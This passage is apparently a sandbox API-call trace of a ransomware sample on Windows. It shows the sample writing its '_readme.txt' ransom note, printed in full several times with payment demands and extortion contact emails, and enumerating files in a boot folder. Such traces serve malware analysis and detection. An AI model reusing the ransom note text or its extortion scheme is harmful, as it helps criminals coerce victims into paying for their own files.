pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0127.948] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0127.948] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.948] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.951] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.951] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.951] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37d4080, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.951] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37d4080, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.951] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.951] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.956] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.957] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.957] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, 